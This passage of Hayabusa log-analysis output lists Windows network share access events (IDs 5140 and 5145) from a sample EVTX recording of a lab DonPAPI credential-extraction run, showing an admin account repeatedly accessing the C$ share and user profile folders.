0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | 